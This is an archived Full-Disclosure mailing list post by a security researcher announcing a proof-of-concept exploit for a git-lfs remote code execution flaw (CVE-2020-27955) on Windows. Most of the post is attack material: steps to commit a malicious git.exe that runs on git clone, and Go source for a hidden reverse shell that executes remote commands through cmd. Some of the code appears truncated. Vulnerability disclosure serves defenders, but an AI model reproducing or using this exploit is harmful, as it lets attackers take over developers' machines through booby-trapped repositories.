lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 4 Nov 2020 23:26:44 -0300
From: Dawid Golunski <>
Subject: [FD] Git LFS (git-lfs) - Remote Code Execution (RCE) exploit
 CVE-2020-27955 - Clone to Pwn

   Go PoC exploit for git-lfs -  Remote Code Execution (RCE)
vulnerability CVE-2020-27955

   Discovered by Dawid Golunski

   Affected (RCE exploit):
   Git / GitHub CLI / GitHub Desktop / Visual Studio / GitKraken /
SmartGit / SourceTree etc.
   Basically the whole Windows dev world which uses git.

   Compile: go build git-lfs-RCE-exploit-CVE-2020-27955.go
   Save & commit as git.exe

   The payload should get executed automatically on git clone operation.
   It spawns a reverse shell, or a calc.exe for testing (if it
couldn't connect).

   An lfs-enabled repository with lfs files may also be needed so that git-lfs
gets invoked. This can be achieved with:

   git lfs track "*.dat"
   echo "fat bug file" > lfsdata.dat
   git add .*
   git add *
   git commmit -m 'git-lfs exploit' -a

   Check out the full advisory for details:

   PoC video at:

 ** For testing purposes only **


package main
import (

func revsh(host string) {

    c, err := net.Dial("tcp", host)
    if nil != err {
    // Conn failed
        if nil != c {
        // Calc for testing purposes if no listener available
        cmd := exec.Command("calc")

    r := bufio.NewReader(c)
    for {
        runcmd, err := r.ReadString('\n')
        if nil != err {
        cmd := exec.Command("cmd", "/C", runcmd)
        cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
        out, _ := cmd.CombinedOutput()

// Connect to netcat listener on local port 1337
func main() {

Dawid Golunski
t: @dawid_golunski

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists